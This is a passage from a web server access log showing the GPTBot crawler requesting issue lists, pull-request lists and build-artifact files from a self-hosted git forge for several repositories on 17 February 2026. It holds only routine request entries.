2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11380] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11377] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11362] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 13953] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 13953] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 13924] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:19:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 14350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" 